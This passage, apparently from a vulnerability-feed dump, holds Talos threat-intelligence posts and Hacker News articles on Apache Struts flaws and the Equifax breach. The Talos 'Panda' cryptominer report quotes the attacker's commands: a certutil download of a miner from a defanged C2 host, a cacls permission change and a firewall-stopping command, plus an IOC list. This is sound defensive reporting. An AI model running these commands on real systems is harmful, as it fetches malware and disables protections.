vulnerability.\n\n[![](https://3.bp.blogspot.com/-eUHPebdBogQ/Wm9dFKuIuhI/AAAAAAAAADU/J27BULbKtxA3iDQoVSkvsUyyrIqtOONZgCLcBGAs/s1600/dos.jpg)](<https://3.bp.blogspot.com/-eUHPebdBogQ/Wm9dFKuIuhI/AAAAAAAAADU/J27BULbKtxA3iDQoVSkvsUyyrIqtOONZgCLcBGAs/s1600/dos.jpg>)\n\n \n\n\nOur primary advice is to install patches as soon as possible. However, patched versions of some software packages are not being released for this vulnerability. In this case, upgrading to a non-vulnerable version would be the preferred option, but this may not be possible in every case. Ensuring that vulnerable systems are protected by IPS with the relevant signatures installed and enabled, helps keep malicious traffic from impacting unpatched vulnerable systems.\n\n \n\n\n## Discussion\n\n \n\n\nSnort signatures detect potentially malicious network activity. Understanding why particular signatures are triggered and how they can protect systems is a key part of network security. Snort signatures can detect and block attempts at exploiting vulnerable systems, indicate when a system is under attack, when a system has been compromised, and help keep users safe from interacting with malicious systems. They can also be used to detect reconnaissance and pre-exploitation activity, indicating that an attacker is attempting to identify weaknesses in an organization\u2019s security posture. These can be used to indicate when an organization should be in a heightened state of awareness about the activity occurring within their environment and more suspicious of security alerts being generated.\n\n \n\n\nAs the threat environment changes, it is necessary to ensure that the correct signatures are in place protecting systems. Usually, this means ensuring that the most recent signature set has been promptly downloaded and installed. As shown in the Apache Struts vulnerability data, the time between a vulnerability being discovered and exploited may be short.\n\n \n\n\nOur most commonly triggered signature in 2017: 1:40522:3 \u201cUnix.Trojan.Mirai variant post compromise fingerprinting\u201d highlights the necessity of protecting IoT devices from attack. Malware such as Mirai seeks to compromise these systems to use them as part of a botnet to put to use for further malicious behaviour. Network architectures need to take these attacks into consideration and ensure that all networked devices no matter how small are protected.\n\n \n\n\nSecurity teams need to understand their network architectures and understand the significance of rules triggering in their environment. For full understanding of the meaning of triggered detections it is important for the signatures to be open source. Knowing what network content caused a signature to trigger tells you about your network and allows you to keep abreast of the threat environment as well as the available protection.\n\n \n\n\nAt Talos, we are proud to maintain a set of open source Snort rules and support the thriving [community of researchers](<https://www.snort.org/community>) contributing to Snort and helping to keep networks secure against attack. We\u2019re also proud to contribute to the training and education of network engineers through the [Cisco Networking Academy](<https://www.netacad.com>), as well through the release of additional [open-source tools](<https://www.talosintelligence.com/software>) and the detailing of attacks on our blog.\n\n \n\n\nThere is no doubt that 2018 will bring its own security challenges and it will be interesting to follow how reported detections are evolving over the year together with new threats. We will make sure to keep you up to date with events relevant to your organizations and networks.\n\n[![](http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA)](<http://feeds.feedburner.com/~ff/feedburner/Talos?a=ZAu5fhdHIK0:DbYh7gve-dY:yIl2AUoC8zA>)\n\n![](http://feeds.feedburner.com/~r/feedburner/Talos/~4/ZAu5fhdHIK0)", "cvss3": {}, "published": "2018-01-29T11:37:00", "type": "talosblog", "title": "2017 in Snort Signatures.", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2016-8610", "CVE-2017-5638"], "modified": "2018-01-29T19:37:15", "id": "TALOSBLOG:991CC85C1D7CC3CD70110C7FAE123FAC", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/ZAu5fhdHIK0/2017-in-snort-signatures.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-09-17T15:28:34", "description": "_By [Christopher Evans](<https://twitter.com/ccevans002>) and [David Liebenberg](<https://twitter.com/ChinaHandDave>)._ \n\n\n## \n\n\n## Executive summary\n\nA new threat actor named \"Panda\" has generated thousands of dollars worth of the Monero cryptocurrency through the use of remote access tools (RATs) and illicit cryptocurrency-mining malware. This is far from the most sophisticated actor we've ever seen, but it still has been one of the most active attackers we've seen in Cisco Talos threat trap data. Panda's willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs, means that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information. \n \nPanda has shown time and again they will update their infrastructure and exploits on the fly as security researchers publicize indicators of compromises and proof of concepts. Our threat traps show that Panda uses exploits previously used by Shadow Brokers \u2014 a group infamous for publishing information from the National Security Agency \u2014 and Mimikatz, an open-source credential-dumping program. \n \nTalos first became aware of Panda in the summer of 2018, when they were engaging in the successful and widespread \"MassMiner\" campaign. Shortly thereafter, we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers. Since then, this actor has updated its infrastructure, exploits and payloads. We believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems. Talos confirmed that organizations in the banking, healthcare, transportation, telecommunications, IT services industries were affected in these campaigns. \n \n\n\n[![](https://1.bp.blogspot.com/-lf0T3p1bzKg/XYDfgN1h6mI/AAAAAAAAB7o/HvFMxzb8QhQbUO85JND7yrZfjwu7xAfTACLcBGAsYHQ/s640/image4.png)](<https://1.bp.blogspot.com/-lf0T3p1bzKg/XYDfgN1h6mI/AAAAAAAAB7o/HvFMxzb8QhQbUO85JND7yrZfjwu7xAfTACLcBGAsYHQ/s1600/image4.png>)\n\n## \n\n\n## First sightings of the not-so-elusive Panda\n\nWe first observed this actor in July of 2018 exploiting a WebLogic vulnerability ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)) to drop a miner that was associated with a campaign called \"[MassMiner](<https://www.alienvault.com/blogs/labs-research/massminer-malware-targeting-web-servers>)\" through the wallet, infrastructure, and post-exploit PowerShell commands used. \n \nPanda used massscan to look for a variety of different vulnerable servers and then exploited several different vulnerabilities, including the aforementioned Oracle bug and a remote code execution vulnerability in Apache Struts 2 ([CVE-2017-5638](<https://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>)). They used PowerShell post-exploit to download a miner payload called \"downloader.exe,\" saving it in the TEMP folder under a simple number filename such as \"13.exe\" and executing it. The sample attempts to download a config file from list[.]idc3389[.]top over port 57890, as well as kingminer[.]club. The config file specifies the Monero wallet to be used as well as the mining pool. In all, we estimate that Panda has amassed an amount of Monero that is currently valued at roughly $100,000. \n\n\n[![](https://1.bp.blogspot.com/-7Ed1781BBr4/XYDfrwNRtKI/AAAAAAAAB7s/nxr6w2FndDcpsmMKiH8a45uPRZmxCy3FgCLcBGAsYHQ/s640/image6.png)](<https://1.bp.blogspot.com/-7Ed1781BBr4/XYDfrwNRtKI/AAAAAAAAB7s/nxr6w2FndDcpsmMKiH8a45uPRZmxCy3FgCLcBGAsYHQ/s1600/image6.png>)\n\n \nBy October 2018, the config file on list[.]idc3389[.]top, which was then an instance of an HttpFileServer (HFS), had been downloaded more than 300,000 times. \n\n\n[![](https://1.bp.blogspot.com/-fpXoN_jw0UU/XYDfx_msBlI/AAAAAAAAB70/SEJLWIIEjUI0rt_HBXROjCsy3KH2RXUrACLcBGAsYHQ/s640/image5.png)](<https://1.bp.blogspot.com/-fpXoN_jw0UU/XYDfx_msBlI/AAAAAAAAB70/SEJLWIIEjUI0rt_HBXROjCsy3KH2RXUrACLcBGAsYHQ/s1600/image5.png>)\n\nThe sample also installs Gh0st RAT, which communicates with the domain rat[.]kingminer[.]club. In several samples, we also observed Panda dropping other hacking tools and exploits. This includes the credential-theft tool Mimikatz and UPX-packed artifacts related to the Equation Group set of exploits. The samples also appear to scan for open SMB ports by reaching out over port 445 to IP addresses in the 172.105.X.X block. \n \nOne of Panda's C2 domains, idc3389[.]top, was registered to a Chinese-speaking actor, who went by the name \"Panda.\" \n \n\n\n## Bulehero connection\n\nAround the same time that we first observed these initial Panda attacks, we observed very similar TTPs in an attack using another C2 domain: bulehero[.]in. The actors used PowerShell to download a file called \"download.exe\" from b[.]bulehero[.]in, and similarly, save it as another simple number filename such as \"13.exe\" and execute it. The file server turned out to be an instance of HFS hosting four malicious files. \n\n\n[![](https://1.bp.blogspot.com/-GbyctYMnyRo/XYDgCR5tbSI/AAAAAAAAB78/3xs1gHqsMD8svymJLjA81TtAbCC4XsTZwCLcBGAsYHQ/s640/image8.png)](<https://1.bp.blogspot.com/-GbyctYMnyRo/XYDgCR5tbSI/AAAAAAAAB78/3xs1gHqsMD8svymJLjA81TtAbCC4XsTZwCLcBGAsYHQ/s1600/image8.png>)\n\n \nRunning the sample in our sandboxes, we observed several elements that connect it to the earlier MassMiner campaign. First, it issues a GET request for a file called cfg.ini hosted on a different subdomain of bulehero[.]in, c[.]bulehero[.]in, over the previously observed port 57890. Consistent with MassMiner, the config file specifies the site from which the original sample came, as well as the wallet and mining pool to be used for mining. \n \nAdditionally, the sample attempts to shut down the victim's firewall with commands such as \"cmd /c net stop MpsSvc\". The malware also modifies the access control list to grant full access to certain files through running cacsl.exe. \n \nFor example: \n\n\n> cmd /c schtasks /create /sc minute /mo 1 /tn \"Netframework\" /ru system /tr \"cmd /c echo Y|cacls C:\\Windows\\appveif.exe /p everyone:F\n\nBoth of these behaviors have also been observed in previous MassMiner infections. \n \nThe malware also issues a GET request to Chinese-language IP geolocation service ip138[.]com for a resource named ic.asp which provides the machine's IP address and location in Chinese. This behavior was also observed in the MassMiner campaign. \n \nAdditionally, appveif.exe creates a number of files in the system directory. Many of these files were determined to be malicious by multiple AV engines and appear to match the exploits of vulnerabilities targeted in the MassMiner campaign. For instance, several artifacts were detected as being related to the \"Shadow Brokers\" exploits and were installed in a suspiciously named directory: \"\\Windows\\InfusedAppe\\Eternalblue139\\specials\\\". \n \n\n\n## Evolution of Panda\n\nIn January of 2019, Talos analysts observed Panda exploiting a recently disclosed vulnerability in the ThinkPHP web framework (CNVD-2018-24942) in order to spread similar malware. ThinkPHP is an open-source web framework popular in China. \n \nPanda used this vulnerability to both directly download a file called \"download.exe\" from a46[.]bulehero[.]in and upload a simple PHP web shell to the path \"/public/hydra.php\", which is subsequently used to invoke PowerShell to download the same executable file. The web shell provides only the ability to invoke arbitrary system commands through URL parameters in an HTTP request to \"/public/hydra.php\". Download.exe would download the illicit miner payload and also engages in SMB scanning, evidence of Panda's attempt to move laterally within compromised organizations. \n \nIn March 2019, we observed the actor leveraging new infrastructure, including various subdomains of the domain hognoob[.]se. At the time, the domain hosting the initial payload, fid[.]hognoob[.]se, resolved to the IP address 195[.]128[.]126[.]241, which was also associated with several subdomains of bulehero[.]in. \n \nAt the time, the actor's tactics, techniques, and procedures (TTPs) remained similar to those used before. Post-exploit, Panda invokes PowerShell to download an executable called \"download.exe\" from the URL hxxp://fid[.]hognoob[.]se/download.exe and save it in the Temp folder, although Panda now saved it under a high-entropy filename i.e. 'C:/Windows/temp/autzipmfvidixxr7407.exe'. This file then downloads a Monero mining trojan named \"wercplshost.exe\" from fid[.]hognoob[.]se as well as a configuration file called \"cfg.ini\" from uio[.]hognoob[.]se, which provides configuration details for the miner. \n\n\n[![](https://1.bp.blogspot.com/-6B6MTCm_3U8/XYDgMB6l-xI/AAAAAAAAB8A/g3ux2o0d2KgGC-H6Sy9BiLx4KUTSo8LwQCLcBGAsYHQ/s640/image7.png)](<https://1.bp.blogspot.com/-6B6MTCm_3U8/XYDgMB6l-xI/AAAAAAAAB8A/g3ux2o0d2KgGC-H6Sy9BiLx4KUTSo8LwQCLcBGAsYHQ/s1600/image7.png>)\n\n \n\"Wercplshost.exe\" contains exploit modules designed for lateral movement, many of which are related to the \"Shadow Brokers\" exploits, and engages in SMB brute-forcing. The sample acquires the victim's internal IP and reaches out to Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis for port scanning. It also uses the open-source tool Mimikatz to collect victim passwords. \n \nSoon thereafter, Panda began leveraging an updated payload. Some of the new features of the payload include using Certutil to download the secondary miner payload through the command: \"certutil.exe -urlcache -split -f http://fid[.]hognoob[.]se/upnpprhost.exe C:\\Windows\\Temp\\upnpprhost.exe\". The coinminer is also run using the command \"cmd /c ping 127.0.0.1 -n 5 & Start C:\\Windows\\ugrpkute\\\\[filename].exe\". \n \nThe updated payload still includes exploit modules designed for lateral movement, many of which are related to the \"Shadow Brokers\" exploits. One departure, however, is previously observed samples acquire the victim's internal IP and reach out to Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis for port scanning. This sample installs WinPcap and open-source tool Masscan and scans for open ports on public IP addresses saving the results to \"Scant.txt\" (note the typo). The sample also writes a list of hardcoded IP ranges to \"ip.txt\" and passes it to Masscan to scan for port 445 and saves the results to \"results.txt.\" This is potentially intended to find machines vulnerable to MS17-010, given the actor's history of using EternalBlue. The payload also leverages previously-used tools, launching Mimikatz to collect victim passwords \n \nIn June, Panda began targeting a newer WebLogic vulnerability, [CVE-2019-2725](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>), but their TTPs remained the same. \n \n\n\n## Recent activity\n\nPanda began employing new C2 and payload-hosting infrastructure over the past month. We observed several attacker IPs post-exploit pulling down payloads from the URL hxxp[:]//wiu[.]fxxxxxxk[.]me/download.exe and saving it under a random 20-character name, with the first 15 characters consisting of \"a\" - \"z\" characters and the last five consisting of digits (e.g., \"xblzcdsafdmqslz19595.exe\"). Panda then executes the file via PowerShell. Wiu[.]fxxxxxxk[.]me resolves to the IP 3[.]123[.]17[.]223, which is associated with older Panda C2s including a46[.]bulehero[.]in and fid[.]hognoob[.]se. \n \nBesides the new infrastructure, the payload is relatively similar to the one they began using in May 2019, including using Certutil to download the secondary miner payload located at hxxp[:]//wiu[.]fxxxxxxk[.]me/sppuihost.exe and using ping to delay execution of this payload. The sample also includes Panda's usual lateral movement modules that include Shadow Brokers' exploits and Mimikatz. \n \nOne difference is that several samples contained a Gh0st RAT default mutex \"DOWNLOAD_SHELL_MUTEX_NAME\" with the mutex name listed as fxxk[.]noilwut0vv[.]club:9898. The sample also made a DNS request for this domain. The domain resolved to the IP 46[.]173[.]217[.]80, which is also associated with several subdomains of fxxxxxxk[.]me and older Panda C2 hognoob[.]se. Combining mining capabilities and Gh0st RAT represents a return to Panda's earlier behavior. \n \nOn August 19, 2019, we observed that Panda has added another set of domains to his inventory of C2 and payload-hosting infrastructure. In line with his previous campaigns, we observed multiple attacker IPs pulling down payloads from the URL hxxp[:]//cb[.]f*ckingmy[.]life/download.exe. In a slight departure from previous behavior, the file was saved as \"BBBBB,\", instead of as a random 20-character name. cb[.]f*ckingmy[.]life (URL censored due to inappropriate language) currently resolves to the IP 217[.]69[.]6[.]42, and was first observed by Cisco Umbrella on August 18. \n \nIn line with previous samples Talos has analyzed over the summer, the initial payload uses Certutil to download the secondary miner payload located at http[:]//cb[.]fuckingmy[.]life:80/trapceapet.exe. This sample also includes a Gh0st RAT mutex, set to \"oo[.]mygoodluck[.]best:51888:WervPoxySvc\", and made a DNS request for this domain. The domain resolved to 46[.]173[.]217[.]80, which hosts a number of subdomains of fxxxxxxk[.]me and hognoob[.]se, both of which are known domains used by Panda. The sample also contacted li[.]bulehero2019[.]club. \n \nCisco Threat Grid's analysis also showed artifacts associated with Panda's typical lateral movement tools that include Shadow Brokers exploits and Mimikatz. The INI file used for miner configuration lists the mining pool as mi[.]oops[.]best, with a backup pool at mx[.]oops[.]best. \n\n\n[![](https://1.bp.blogspot.com/-2-PgtrQPKAE/XYDgeQ-XHeI/AAAAAAAAB8Q/2AJE3Rk0IHURq9oeqIjqMw-Ft37AHxp_ACLcBGAsYHQ/s640/image1.png)](<https://1.bp.blogspot.com/-2-PgtrQPKAE/XYDgeQ-XHeI/AAAAAAAAB8Q/2AJE3Rk0IHURq9oeqIjqMw-Ft37AHxp_ACLcBGAsYHQ/s1600/image1.png>)\n\n[![](https://1.bp.blogspot.com/-uPJKV52J9K0/XYDgjBhDZaI/AAAAAAAAB8U/sfPHOODu5c8pmRVRrcPdlaQ6G-VnpW9VQCLcBGAsYHQ/s640/image3.png)](<https://1.bp.blogspot.com/-uPJKV52J9K0/XYDgjBhDZaI/AAAAAAAAB8U/sfPHOODu5c8pmRVRrcPdlaQ6G-VnpW9VQCLcBGAsYHQ/s1600/image3.png>)\n\n## \n\n\n## Conclusion\n\nPanda's operational security remains poor, with many of their old and current domains all hosted on the same IP and their TTPs remaining relatively similar throughout campaigns. The payloads themselves are also not very sophisticated. \n \nHowever, system administrators and researchers should never underestimate the damage an actor can do with widely available tools such as Mimikatz. Some information from HFS used by Panda shows that this malware had a wide reach and rough calculations on the amount of Monero generated show they made around 1,215 XMR in profits through their malicious activities, which today equals around $100,000, though the amount of realized profits is dependent on the time they sold. \n \nPanda remains one of the most consistent actors engaging in illicit mining attacks and frequently shifts the infrastructure used in their attacks. They also frequently update their targeting, using a variety of exploits to target multiple vulnerabilities, and is quick to start exploiting known vulnerabilities shortly after public POCs become available, becoming a menace to anyone slow to patch. And, if a cryptocurrency miner is able to infect your system, that means another actor could use the same infection vector to deliver other malware. Panda remains an active threat and Talos will continue to monitor their activity in order to thwart their operations. \n\n\n## \n\n\n## COVERAGE\n\nFor coverage related to blocking illicit cryptocurrency mining, please see the Cisco Talos white paper: [Blocking Cryptocurrency Mining Using Cisco Security Products](<https://talosintelligence.com/resources/65>) \n \n\n\n[![](https://1.bp.blogspot.com/-VoLoSQumND8/XYDgUqa4CvI/AAAAAAAAB8I/dQAoulvM4nofqrokMtgPSQZJYLLOLLmZwCLcBGAsYHQ/s1600/image2.png)](<https://1.bp.blogspot.com/-VoLoSQumND8/XYDgUqa4CvI/AAAAAAAAB8I/dQAoulvM4nofqrokMtgPSQZJYLLOLLmZwCLcBGAsYHQ/s1600/image2.png>)\n\nAdvanced Malware Protection ([AMP](<https://www.cisco.com/c/en/us/products/security/advanced-malware-protection>)) is ideally suited to prevent the execution of the malware used by these threat actors. \n \nCisco Cloud Web Security ([CWS](<https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html>)) or[ Web Security Appliance (WSA](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>)) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \nNetwork Security appliances such as[ Next-Generation Firewall (NGFW](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>)),[ Next-Generation Intrusion Prevention System (NGIPS](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>)), and[ Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat. \n \n[AMP Threat Grid](<https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html>) helps identify malicious binaries and build protection into all Cisco Security products. \n \n[Umbrella](<https://umbrella.cisco.com/>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \nOpen Source SNORT\u24c7 Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.snort.org/products>). \n\n\n## IOCs\n\n### Domains\n\na45[.]bulehero[.]in \na46[.]bulehero[.]in \na47[.]bulehero[.]in \na48[.]bulehero[.]in \na88[.]bulehero[.]in \na88[.]heroherohero[.]info \na[.]bulehero[.]in \naic[.]fxxxxxxk[.]me \naxx[.]bulehero[.]in \nb[.]bulehero[.]in \nbulehero[.]in \nc[.]bulehero[.]in \ncb[.]fuckingmy[.].life \ncnm[.]idc3389[.]top \ndown[.]idc3389[.]top \nfid[.]hognoob[.]se \nfxxk[.]noilwut0vv[.]club \nhaq[.]hognoob[.]se \nidc3389[.]top \nidc3389[.]cc \nidc3389[.]pw \nli[.]bulehero2019[.]club \nlist[.]idc3389[.]top \nmi[.]oops[.]best \nmx[.]oops[.]best \nnrs[.]hognoob[.]se \noo[.]mygoodluck[.]best \npool[.]bulehero[.]in \npxi[.]hognoob[.]se \npxx[.]hognoob[.]se \nq1a[.]hognoob[.]se \nqie[.]fxxxxxxk[.]me \nrp[.]oiwcvbnc2e[.]stream \nuio[.]heroherohero[.]info \nuio[.]hognoob[.]se \nupa1[.]hognoob[.]se \nupa2[.]hognoob[.]se \nwiu[.]fxxxxxxk[.]me \nyxw[.]hognoob[.]se \nzik[.]fxxxxxxk[.]me \n\n\n### IPs\n\n184[.]168[.]221[.]47 \n172[.]104[.]87[.]6 \n139[.]162[.]123[.]87 \n139[.]162[.]110[.]201 \n116[.]193[.]154[.]122 \n95[.]128[.]126[.]241 \n195[.]128[.]127[.]254 \n195[.]128[.]126[.]120 \n195[.]128[.]126[.]243 \n195[.]128[.]124[.]140 \n139[.]162[.]71[.]92 \n3[.]123[.]17[.]223 \n46[.]173[.]217[.]80 \n5[.]56[.]133[.]246 \n\n\n### SHA-256\n\n2df8cfa5ea4d63615c526613671bbd02cfa9ddf180a79b4e542a2714ab02a3c1 \nfa4889533cb03fc4ade5b9891d4468bac9010c04456ec6dd8c4aba44c8af9220 \n2f4d46d02757bcf4f65de700487b667f8846c38ddb50fbc5b2ac47cfa9e29beb \n829729471dfd7e6028af430b568cc6e812f09bb47c93f382a123ccf3698c8c08 \n8b645c854a3bd3c3a222acc776301b380e60b5d0d6428db94d53fad6a98fc4ec \n1e4f93a22ccbf35e2f7c4981a6e8eff7c905bc7dbb5fedadd9ed80768e00ab27 \n0697127fb6fa77e80b44c53d2a551862709951969f594df311f10dcf2619c9d5 \nf9a972757cd0d8a837eb30f6a28bc9b5e2a6674825b18359648c50bbb7d6d74a \n34186e115f36584175058dac3d34fe0442d435d6e5f8c5e76f0a3df15c9cd5fb \n29b6dc1a00fea36bc3705344abea47ac633bc6dbff0c638b120d72bc6b38a36f \n3ed90f9fbc9751a31bf5ab817928d6077ba82113a03232682d864fb6d7c69976 \na415518642ce4ad11ff645151195ca6e7b364da95a8f89326d68c836f4e2cae1 \n4d1f49fac538692902cc627ab7d9af07680af68dd6ed87ab16710d858cc4269c \n8dea116dd237294c8c1f96c3d44007c3cd45a5787a2ef59e839c740bf5459f21 \n991a9a8da992731759a19e470c36654930f0e3d36337e98885e56bd252be927e \na3f1c90ce5c76498621250122186a0312e4f36e3bfcfede882c83d06dd286da1 \n9c37a6b2f4cfbf654c0a5b4a4e78b5bbb3ba26ffbfab393f0d43dad9000cb2d3 \nd5c1848ba6fdc6f260439498e91613a5db8acbef10d203a18f6b9740d2cab3ca \n29b6dc1a00fea36bc3705344abea47ac633bc6dbff0c638b120d72bc6b38a36f \n6d5479adcfa4c31ad565ab40d2ea8651bed6bd68073c77636d1fe86d55d90c8d \n\n\n### Monero Wallets\n\n49Rocc2niuCTyVMakjq7zU7njgZq3deBwba3pTcGFjLnB2Gvxt8z6PsfEn4sc8WPPedTkGjQVHk2RLk7btk6Js8gKv9iLCi 1198.851653275126 \n4AN9zC5PGgQWtg1mTNZDySHSS79nG1qd4FWA1rVjEGZV84R8BqoLN9wU1UCnmvu1rj89bjY4Fat1XgEiKks6FoeiRi1EHhh \n44qLwCLcifP4KZfkqwNJj4fTbQ8rkLCxJc3TW4UBwciZ95yWFuQD6mD4QeDusREBXMhHX9DzT5LBaWdVbsjStfjR9PXaV9L \n \n![](http://feeds.feedburner.com/~r/feedburner/Talos/~4/3w3NM3N6VuY)", "cvss3": {}, "published": "2019-09-17T08:09:45", "type": "talosblog", "title": "Cryptocurrency miners aren\u2019t dead yet: Documenting the voracious but simple \u201cPanda\u201d", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2017-5638", "CVE-2019-2725"], "modified": "2019-09-17T08:09:45", "id": "TALOSBLOG:E8F926D413AF8A060A5CA7289C0EAD20", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/3w3NM3N6VuY/panda-evolution.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2018-01-27T09:17:55", "description": "[![equifax-apache-struts](https://3.bp.blogspot.com/-F7ViQ9JXvL8/Wbo_3TiAKWI/AAAAAAAAAJM/fsHVxS_O8ysIy4sZ2wdnG1OfLkiNJTjzgCLcBGAs/s1600/equifax-apache-struts.png)](<https://3.bp.blogspot.com/-F7ViQ9JXvL8/Wbo_3TiAKWI/AAAAAAAAAJM/fsHVxS_O8ysIy4sZ2wdnG1OfLkiNJTjzgCLcBGAs/s1600/equifax-apache-struts.png>)\n\nThe [massive Equifax data breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>) that exposed highly sensitive data of as many as 143 million people was caused by [exploiting a flaw in Apache Struts](<https://thehackernews.com/2017/03/apache-struts-framework.html>) framework, which Apache patched over two months earlier of the security incident, Equifax has confirmed. \n \nCredit rating agency Equifax is yet another example of the companies that became victims of massive cyber attacks due to not patching a critical vulnerability on time, for which patches were already issued by the respected companies. \n \nRated critical with a maximum 10.0 score, the Apache Struts2 vulnerability (CVE-2017-5638) exploited in the Equifax breach was disclosed and fixed by Apache on March 6 with the release of Apache Struts version 2.3.32 or 2.5.10.1. \n \nThis flaw is separate from CVE-2017-9805, [another Apache Struts2 vulnerability](<https://thehackernews.com/2017/09/apache-struts-vulnerability.html>) that was patched earlier this month, which was a programming bug that manifests due to the way Struts REST plugin handles XML payloads while deserializing them, and was fixed in Struts version 2.5.13. \n \nRight after the disclosure of the vulnerability, hackers started actively exploiting the flaw in the wild to install rogue applications on affected web servers after its [proof-of-concept (PoC) exploit code](<https://thehackernews.com/2017/03/apache-struts-framework.html>) was uploaded to a Chinese site. \n \nDespite patches were made available and proofs that the flaw was already under mass attack by hackers, Equifax failed to patched its Web applications against the flaw, which resulted in the breach of personal data of [nearly half of the US population](<https://thehackernews.com/2017/09/equifax-credit-report-hack.html>). \n\n\n> \"Equifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cyber security firm to determine what information was accessed and who have been impacted,\" the company officials wrote in an [update on the website](<https://www.equifaxsecurity2017.com/>) with a new \"A Progress Update for Consumers.\" \n\n> \"We [know that](<https://www.equifaxsecurity2017.com/2017/09/13/progress-update-consumers-4/>) criminals exploited a US website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement.\"\n\nCVE-2017-5638 was a then-zero-day vulnerability discovered in the [popular Apache Struts](<https://thehackernews.com/2017/09/apache-struts-flaws-cisco.html>) web application framework by Cisco's Threat intelligence firm Talos, which observed a number of active attacks exploiting the flaw. \n \nThe issue was a remote code execution bug in the Jakarta Multipart parser of Apache Struts2 that could allow an attacker to execute malicious commands on the server when uploading files based on the parser. \n \nAt the time, Apache warned it was possible to perform a remote code execution attack with \"a malicious Content-Type value,\" and if this value is not valid \"an exception is thrown which is then used to display an error message to a user.\" \n \n**Also Read: **[Steps You Should Follow to Protect Yourself From Equifax Breach](<https://thehackernews.com/2017/09/equifax-data-breach.html>) \n \nFor those unaware, Apache Struts is a free, open-source MVC framework for developing web applications in the Java programming language that run both front-end and back-end Web servers. The framework is used by 65n per cent of the Fortune 100 companies, including Lockheed Martin, Vodafone, Virgin Atlantic, and the IRS. \n \nSince the hackers are actively exploiting the vulnerabilities in the Apache Struts web framework, Cisco has also [initiated an investigation](<https://thehackernews.com/2017/09/apache-struts-flaws-cisco.html>) into its products against four newly discovered security vulnerabilities in Apache Struts2. \n \nOther companies that also incorporate a version of Apache Struts 2 should also check their infrastructures against these vulnerabilities. \n \nEquifax is currently offering free credit-monitoring and identity theft protection services for people who are affected by the massive data leak and has also enabled a security freeze for access to people's information. \n \nWhile the company was initially criticised for generating a PIN that was simply a time and date stamp and easy-to-guess, the PIN generation method was later changed to randomly generate numbers.\n", "cvss3": {}, "published": "2017-09-13T21:38:00", "type": "thn", "title": "Equifax Suffered Data Breach After It Failed to Patch Old Apache Struts Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-15T10:00:54", "id": "THN:6C0E5E35ABB362C8EA341381B3DD76D6", "href": "https://thehackernews.com/2017/09/equifax-apache-struts.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-05-09T12:40:18", "description": "[![apache struts vulnerability hacking](https://thehackernews.com/images/-ktDJMSI6Gdo/W310Im7Od5I/AAAAAAAAx8k/iNNQd5VURi8zRV8-MZosbkEo-V4eXjqowCLcBGAs/s728-e100/apache-struts-vulnerability-hacking.png)](<https://thehackernews.com/images/-ktDJMSI6Gdo/W310Im7Od5I/AAAAAAAAx8k/iNNQd5VURi8zRV8-MZosbkEo-V4eXjqowCLcBGAs/s728-e100/apache-struts-vulnerability-hacking.png>)\n\nSemmle security researcher Man Yue Mo has [disclosed](<https://lgtm.com/blog/apache_struts_CVE-2018-11776>) a critical remote code execution vulnerability in the popular Apache Struts web application framework that could allow remote attackers to run malicious code on the affected servers. \n \nApache Struts is an open source framework for developing web applications in the Java programming language and is widely used by enterprises globally, including by 65 percent of the Fortune 100 companies, like Vodafone, Lockheed Martin, Virgin Atlantic, and the IRS. \n \nThe vulnerability (**CVE-2018-11776**) resides in the core of Apache Struts and originates because of insufficient validation of user-provided untrusted inputs in the core of the Struts framework under certain configurations. \n \nThe newly found Apache Struts exploit can be triggered just by visiting a specially crafted URL on the affected web server, allowing attackers to execute malicious code and eventually take complete control over the targeted server running the vulnerable application. \n \n\n\n## Struts2 Vulnerability - Are You Affected?\n\n \nAll applications that use Apache Struts\u2014supported versions (Struts 2.3 to Struts 2.3.34, and Struts 2.5 to Struts 2.5.16) and even some unsupported Apache Struts versions\u2014are potentially vulnerable to this flaw, even when no additional plugins have been enabled. \n \n\n\n> \"This vulnerability affects commonly-used endpoints of Struts, which are likely to be exposed, opening up an attack vector to malicious hackers,\" Yue Mo said.\n\n \nYour Apache Struts implementation is vulnerable to the reported RCE flaw if it meets the following conditions: \n\n\n * The **alwaysSelectFullNamespace** flag is set to true in the Struts configuration.\n * Struts configuration file contains an \"action\" or \"url\" tag that does not specify the optional namespace attribute or specifies 